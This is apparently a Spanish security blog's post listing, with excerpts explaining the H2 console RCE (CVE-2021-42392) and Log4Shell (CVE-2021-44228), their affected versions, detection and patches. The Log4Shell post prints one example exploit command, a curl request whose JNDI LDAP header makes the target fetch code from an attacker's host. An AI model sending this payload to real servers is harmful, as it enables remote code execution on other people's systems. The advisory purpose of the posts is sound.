25 enero 2022

Top 10 OWASP

enero 25, 2022 akil3s OWASP Top 10 No comments Edit

Hoy os dejo un PDF que hice a mediados de 2020 con el Top 10 de OWASP, explicando cada punto y en castellano. Sé que hay una versión actual, pero seguro que os sirve.

Si quieres tener este PDF, sigue leyendo.

07 enero 2022

RCE en consola de BBDD H2 (CVE-2021-42392)

enero 07, 2022 akil3s CVE-2021-42392, hacking, pentest, vulnerabilidad No comments Edit

No hace aún un mes que escribí sobre la ya conocidísima vulnerabilidad de Log4Shell. Pues bien, ahora nos encontramos ante un nuevo RCE, en este caso en la base de datos Java SQL, bautizada como CVE-2021-42392. Si te interesa saber más sobre este nuevo problema, continúa leyendo.

H2:

Los investigadores de JFrog han sido los que han reportado este nuevo problema. H2 es una BBDD en Java SQL bastante popular y de código abierto, que no necesita que los datos se almacenen en disco.

Algunas plataformas como Spring Boot, Play Framework y JHipster y otras de IoT como ThingWorks la utilizan, por lo que podría ser de una alta criticidad.

Versiones afectadas:

Esta vulnerabilidad afecta a las versiones de H2 Console desde la v1.1.100 (de 2008) a la v2.0.204 (de diciembre de 2021) y permitiría la carga de clases desde el servidor de un atacante a través de JNDI, aunque a priori, H2 no acepta por defecto conexiones remotas.

Explotabilidad:

Según los investigadores de JFrog, la vulnerabilidad se explota de forma parecida a Log4Shell, JNDI podría permitir un RCE dando a un atacante control sobre los sistemas de una organización, aunque advierten que en un principio no debería estar tan extendido como Log4Shell.

Al contrario que ocurría con Log4Shell, este fallo tiene un alcance directo, y el servidor que procesa la solicitud sería el afectado por el RCE, lo que, según los investigadores, debería ser menos grave que Log4Shell.

Como mencionaba anteriormente, por defecto, la consola de H2 no escucha conexiones externas (solo las de local host), por lo que la configuración predeterminada, debería ser segura, no como en el caso de Log4Shell que ya era explotable la configuración por defecto. El problema viene dado por la facilidad que existe para cambiar ese parámetro para que también escuche conexiones de fuera.

Solución:

Esta vulnerabilidad ya cuenta con una versión que soluciona el problema (no como ocurría con Log4Shell que estuvo días sin parche) la v2.0.206 que limita las URL de JNDI y deniega cualquier tipo de consulta al LDAP de manera remota. Por lo tanto, ¡corre a parchear!

Fuente: https://thehackernews.com/2022/01/log4shell-like-critical-rce-flaw.html

11 diciembre 2021

LOG4SHell otro RCE (CVE-2021-44228)

diciembre 11, 2021 akil3s CVE-2021-44228, hacking, pentest, zero day No comments Edit

Hace unos días (9 de diciembre) apareció un nuevo RCE, aunque se dio a conocer el 24 de noviembre a través del equipo de seguridad de Alibaba Cloud.

LOG4SHell es un Zero day en la biblioteca de registro de Java log4j2 que da por resultado un RCE (ejecución de código remota) a través del registro de una string concreta.

Log4j es una biblioteca de código abierto desarrollada en Java por la Apache Software Foundation que permite a los desarrolladores de software escribir mensajes de registro (segun wikipedia).

La vulnerabilidad se ha registrado como CVE-2021-44228. Esta se considera de carácter crítico, ya que aparece con un CVE de 10 (el más alto).

Log4j es un sistema bastante utilizado, por lo que se están viendo afectados desde servicios en la nube, como iCloud hasta aplicaciones como Minecraft (hay POC sobre esto). Por ello, cualquier aplicación que use SpringBoot con Java, seguramente esté expuesta en este momento.

Si tienes instalada una versión desde la 2.0 a la 2.14.1 eres vulnerable a este RCE. Aunque según cuentan desde Alibaba, el software concreto afectado sería:

Apache Flink
Apache Solr
Apache Druid
Apache Struts2 (recordemos que este ya tuvo su CVE el año pasado)

Un atacante, podría enviar una solicitud maliciosa al servidor atacado a través del protocolo HTTP (Curl, o cualquier otro). El servidor recibiría la solicitud. La versión vulnerable de Log4j permitiría su ejecución, y el servidor atacado realizaría una petición a un servidor del atacante que se "traería" el exploit (fichero culo.class, por ejemplo xD), el cual se inyectaría en el servidor víctima y, por último, ese exploit se ejecutaría:

curl X.X.X.X:8000 -H 'X-Api-Version: ${jndi:ldap://culo.es/exp}'

Para una explicación más completa acerca de la POC, puedes visitar este GitHub.

Cas van Cooten tuiteó el mismo día 10, que simplemente con cambiar el nombre en un iPhone, desencadena dicha vulnerabilidad.

Para detectar este ataque, hay un repositorio de GitHub de cyb3rops con reglas de Yara (herramienta para la detección de malware basada en reglas). Además, se han añadido ya a IDS como Snort o Suricata.

Actualización:

Parece ser que con la versión 2.15.0 de Log4j se corregiría este problema, así que, ya sabes. Si tienes alguna de las versiones afectadas, ¡actualiza ya!

Nos vemos en la siguiente.

09 noviembre 2021

Máquina BoilerCTF THM

noviembre 09, 2021 akil3s hacking, pentest, THM, walkthrough No comments Edit

Acabo de terminar la máquina BoilerCTF de la plataforma THM. La verdad que esta máquina no es difícil, pero hasta que das con la clave, madre mía...

Si quieres saber como la he resuelto finalmente, te recomiendo que sigas leyendo.

Hacking Life

Pruebas de concepto, máquinas HTB, TryHackMe, VulnHub, etc. Todo lo relacionado con seguridad informática

Buscar